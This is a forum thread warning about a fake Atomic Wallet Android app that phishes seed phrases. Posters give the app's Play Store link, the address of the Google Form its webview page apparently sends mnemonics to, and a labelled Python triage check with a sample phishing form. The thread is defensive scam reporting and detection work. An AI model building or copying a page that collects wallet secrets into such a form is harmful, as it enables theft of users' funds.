Bitcoin Forum
Author Topic: [SCAM] Fake Atomic wallet phishing app  (Read 147 times)
dkbit98 (OP)
July 09, 2020, 01:29:36 PM
 #1

What happened: Fake Atomic Wallet app that is phishing for your seed words and private key.
Do NOT download and install this!
REPORT IT

Website:
Code:
https://play.google.com/store/apps/details?id=com.atomicwallet.atomicwalletmanager
Archive: http://archive.vn/jD5tw
ANN: not found

The real and original Atomic wallet app is only this:
https://play.google.com/store/apps/details?id=io.atomicwallet

Casdinyard
July 09, 2020, 01:53:17 PM
 #2

~

FLAG SUPPORTED!

I've also looked at the fake app's permissions and it was too suspicious, as it only requires full network access permission while most wallets need almost everything, and the fake wallet app's features contradict its required permissions. Also, its file size seems to only need its phishing activities to run as a crypto wallet.


Good catch op!

409H
July 10, 2020, 12:48:15 AM
 #3

I have decompiled the APK and reported to AtomicWallet via Twitter DM

The app loads a local HTML file into a webview and asks for mnemonic phrases, which it then sends to a Google Form (https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/viewform)
Casdinyard
July 10, 2020, 02:02:35 PM
 #4

Quote from: 409H on July 10, 2020, 12:48:15 AM
"I have decompiled the APK and reported to AtomicWallet via Twitter DM

The app loads a local HTML file into a webview and asks for mnemonic phrases, which it then sends to a Google Form (https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/viewform)"

Can you indicate here the APK code that has the line that leads to that file? Knowing that it redirects to a Google Form and then sends to the attacker wouldn't be enough; evidence such as screenshots or the real code will do. The file you've indicated is only, I guess, a dummy file form. If they would use Google, wouldn't it be that hard and difficult to link due to security measures of Google?

Now I see why they only need network access permission, so that they could redirect the user's phrases input in the fake app.

409H
July 10, 2020, 02:29:21 PM
 #5

Quote from: Casdinyard on July 10, 2020, 02:02:35 PM
"Quote from: 409H on July 10, 2020, 12:48:15 AM
'I have decompiled the APK and reported to AtomicWallet via Twitter DM

The app loads a local HTML file into a webview and asks for mnemonic phrases, which it then sends to a Google Form (https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/viewform)'

Can you indicate here the APK code that has the line that leads to that file? Knowing that it redirects to a Google Form and then sends to the attacker wouldn't be enough; evidence such as screenshots or the real code will do. The file you've indicated is only, I guess, a dummy file form. If they would use Google, wouldn't it be that hard and difficult to link due to security measures of Google?

Now I see why they only need network access permission, so that they could redirect the user's phrases input in the fake app."

For sure. They use the Google Form to host the submitted data, but have a custom HTML view to make it look more legitimate.

https://i.imgur.com/JAIiQ9L.png
https://i.imgur.com/jWoXYcU.png

Here's a video of me running the webviewed HTML file on a local server: https://youtu.be/-Z00p-l5KIM
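
Added example, not part of any post in this thread and not code taken from the app: a static triage check for the pattern described in posts #2 and #3 (INTERNET as the only permission, plus a bundled HTML page that asks for the mnemonic and points at a Google Form). It assumes a decoded APK tree with a text `AndroidManifest.xml` and web files under `assets/`; the keyword list, `FORM_HOSTS`, the function names and the sample files are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Wording a phishing page uses to request wallet recovery secrets (assumed list).
SECRET_WORDS = re.compile(
    r"mnemonic|seed\s+(?:phrase|words?)|recovery\s+phrase|private\s+key", re.I)
URL = re.compile(r"https?://[^\s\"'<>)]+", re.I)
PERMISSION = re.compile(r'<uses-permission[^>]*android:name="([^"]+)"')
# Hosted form services (host -> path prefix); extend as needed.
FORM_HOSTS = {"docs.google.com": "/forms/"}
WEB_SUFFIXES = (".html", ".htm", ".js")

def load_tree(root):
    """Read the manifest and web files from a decoded APK directory."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p.read_text(errors="replace")
            for p in root.rglob("*")
            if p.is_file() and (p.name == "AndroidManifest.xml"
                                or p.suffix.lower() in WEB_SUFFIXES)}

def triage(files):
    """files maps relative path -> text. Returns a list of findings."""
    findings = []
    perms = set(PERMISSION.findall(files.get("AndroidManifest.xml", "")))
    if perms == {"android.permission.INTERNET"}:
        findings.append("manifest: INTERNET is the only permission requested")
    for path, text in sorted(files.items()):
        if not (path.startswith("assets/") and path.endswith(WEB_SUFFIXES)):
            continue
        if not SECRET_WORDS.search(text):
            continue  # page does not ask for recovery secrets
        for url in URL.findall(text):
            u = urlparse(url)
            prefix = FORM_HOSTS.get(u.hostname or "")
            if prefix and u.path.startswith(prefix):
                findings.append(f"{path}: asks for recovery secrets and "
                                f"references a hosted form on {u.hostname}")
                break
    return findings

# Constructed sample, not the real app's files; EXAMPLE_FORM_ID is a placeholder.
SAMPLE = {
    "AndroidManifest.xml": '<manifest package="com.example.fakewallet">'
        '<uses-permission android:name="android.permission.INTERNET"/></manifest>',
    "assets/index.html": '<form method="post" action="https://docs.google.com/'
        'forms/d/e/EXAMPLE_FORM_ID/formResponse"><label>Enter your 12-word '
        'mnemonic phrase</label><textarea name="entry.1"></textarea></form>',
    "assets/about.html": "<p>Visit https://example.com for help</p>",
}
```

Either finding alone is weak evidence; the two together match what the posters describe. A hit is a prompt for manual review of the flagged asset, not a verdict.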
sujonali1819
July 10, 2020, 02:54:36 PM
 #6

Quote from: dkbit98 on July 09, 2020, 01:29:36 PM
"Website:
Code:
https://play.google.com/store/apps/details?id=com.atomicwallet.atomicwalletmanager"

It seems the link is showing an error. Maybe it was removed from the Google Play store. It's really a good job by Google.

Actually, scams are everywhere nowadays. And it is really very hard to stay alive on the internet for some unaware people. And these types of fake wallets play a vital role to stop them. So we have to be aware of it and we should report these wallets ASAP after seeing them.
